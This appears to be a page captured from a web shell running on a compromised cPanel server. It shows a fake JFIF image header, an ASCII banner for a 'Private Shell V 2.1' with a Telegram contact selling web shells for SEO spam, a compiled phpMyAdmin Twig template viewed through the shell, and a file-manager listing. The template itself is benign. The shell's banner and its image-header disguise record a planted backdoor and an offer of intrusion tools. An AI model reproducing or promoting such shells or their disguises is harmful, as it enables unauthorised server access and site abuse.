����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
use Twig\Environment;
use Twig\Error\LoaderError;
use Twig\Error\RuntimeError;
use Twig\Extension\CoreExtension;
use Twig\Extension\SandboxExtension;
use Twig\Markup;
use Twig\Sandbox\SecurityError;
use Twig\Sandbox\SecurityNotAllowedTagError;
use Twig\Sandbox\SecurityNotAllowedFilterError;
use Twig\Sandbox\SecurityNotAllowedFunctionError;
use Twig\Source;
use Twig\Template;
/* database/structure/add_prefix.twig */
class __TwigTemplate_f1c208fdf7ed961c832f01f2464b1099 extends Template
{
private $source;
private $macros = [];
public function __construct(Environment $env)
{
parent::__construct($env);
$this->source = $this->getSourceContext();
$this->parent = false;
$this->blocks = [
];
}
protected function doDisplay(array $context, array $blocks = [])
{
$macros = $this->macros;
// line 1
yield "<form id=\"ajax_form\" action=\"";
yield PhpMyAdmin\Url::getFromRoute("/database/structure/add-prefix-table");
yield "\" method=\"post\">
";
// line 2
yield PhpMyAdmin\Url::getHiddenInputs(($context["url_params"] ?? null));
yield "
<fieldset class=\"pma-fieldset input\">
<table>
<tr>
<td>";
yield _gettext("Add prefix");
// line 7
yield "</td>
<td>
<input type=\"text\" name=\"add_prefix\" id=\"txtPrefix\" aria-label=\"";
yield _gettext("Add prefix");
// line 9
yield "\">
</td>
</tr>
<tr>
</table>
</fieldset>
</form>
";
return; yield '';
}
/**
* @codeCoverageIgnore
*/
public function getTemplateName()
{
return "database/structure/add_prefix.twig";
}
/**
* @codeCoverageIgnore
*/
public function isTraitable()
{
return false;
}
/**
* @codeCoverageIgnore
*/
public function getDebugInfo()
{
return array ( 57 => 9, 52 => 7, 43 => 2, 38 => 1,);
}
public function getSourceContext()
{
return new Source("", "database/structure/add_prefix.twig", "/usr/local/cpanel/base/3rdparty/phpMyAdmin/templates/database/structure/add_prefix.twig");
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 4cf10677c79365fb7620243783ee1d62.php | File | 2.18 KB | 0644 |
|